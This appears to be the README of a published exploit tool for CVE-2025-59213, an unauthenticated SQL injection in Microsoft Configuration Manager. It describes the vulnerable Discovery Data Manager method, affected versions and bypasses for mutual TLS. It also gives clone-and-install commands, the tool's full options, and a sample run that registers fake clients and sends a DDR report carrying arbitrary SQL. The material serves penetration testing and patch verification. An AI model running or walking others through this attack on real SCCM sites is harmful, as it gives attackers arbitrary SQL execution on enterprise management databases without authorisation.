Microsoft Configuration Manager (ConfigMgr / SCCM) 2503 Unauthenticated SQL injection (CVE-2025-59213) exploit
This script exploits the CVE-2025-59213 vulnerability, which allows an unauthenticated attacker with network access to a Management Point to execute arbitrary SQL queries on the site database by abusing a SQL injection flaw in the Discovery Data Manager (DDM) DuplicateAMTMachineRecord method, where the unescaped Hardware_ID0 field is improperly handled during the merge of two clients with conflicting hardware IDs.
When KB34503790 is missing, all the following Microsoft Configuration Manager versions are vulnerable:
- < 2503 (5.00.9135.1008)
- < 2409 (5.00.9132.1029)
- < 2403 (5.00.9128.1035)
- <= 2303 (*)
- In some cases, when the management point is configured with HTTPS Only communication mode, a PKI certificate is required to perform mutual TLS authentication against the vulnerable HTTP service. Any certificate issued by the internal PKI with the Client Authentication purpose will work.
- If you don't have a certificate, use the
--altauthswitch (more information here)
- The exploit requires registering two fake clients, which the script automatically deletes upon a successful SQL injection unless the
--no-cleanswitch is used or a patch prevents the cleanup from triggering. - Because the injection is asynchronous, time-based payloads are ineffective as there is no direct correlation between execution and response time.
You can install by cloning the repository and installing the dependencies.
$ git clone https://github.com/synacktiv/CVE-2025-59213
$ cd CVE-2025-59213
$ python3 -m venv .venv && source .venv/bin/activate
$ python3 -m pip install -r requirements.txt $ python3 CVE-2025-59213.py -h
usage: CVE-2025-59213.py [-h] -t TARGET [-sk SIGKEY] [-k KEY] [-c CERT] [-v] -cn CLIENT_NAME [-rs REGISTRATION_SLEEP] [-a] -sql SQL [-nc]
CVE-2025-59213 - Discovery Data Manager (DDM) Unauthenticated SQL Injection
options:
-h, --help show this help message and exit
-t, --target TARGET Target (http://sccm-mp.local/)
-sk, --sigkey SIGKEY SMS signature key (automatically generated if omitted)
-k, --key KEY Private key file for mTLS
-c, --cert CERT Certificate file for mTLS
-v, --verbose Verbose output, print requests
-cn, --client-name CLIENT_NAME
Name of the client that will be created in SCCM
-rs, --registration-sleep REGISTRATION_SLEEP
The amount of time, in seconds, that should be waited after registrating a new device (10 seconds by default)
-a, --altauth Use the MP's alternate authentication endpoint
-sql SQL Query to execute through the SQL injection
-nc, --no-clean Do not automatically clean the registred devices$ python3 ./CVE-2025-59213.py -t https://cmc.corp.local --altauth -cn FAKE_CLIENT_NAME -sql 'select 1'
[+] Generated new signing key, saved to /tmp/sccm_poc.key
[+] CcmMessage : ID={D731ED0A-4474-497D-A191-D8948E17ECBF}
[+] Got SMSID = GUID:CF4AFCD1-7237-4C04-8252-CC0F5B881F3F for new client FAKE_CLIENT_NAME
[+] CcmMessage : ID={23EEE9B8-7971-4560-9D18-9328C5DF0C2E}
[+] Got SMSID = GUID:26A34806-CE06-4212-A830-C1E3AC9D7F69 for new client FAKE_CLIENT_NAME
[+] Sending DDR report: SMSID=GUID:CF4AFCD1-7237-4C04-8252-CC0F5B881F3F OLDSMSID=GUID:26A34806-CE06-4212-A830-C1E3AC9D7F69
[+] CcmMessage : ID={88B6BEBD-1F99-4BD2-8786-6BD3C6CFF299}
[+] CcmMessage : adding clientauth
[+] CcmMessage : adding attachment
[+] DDR report sent successfully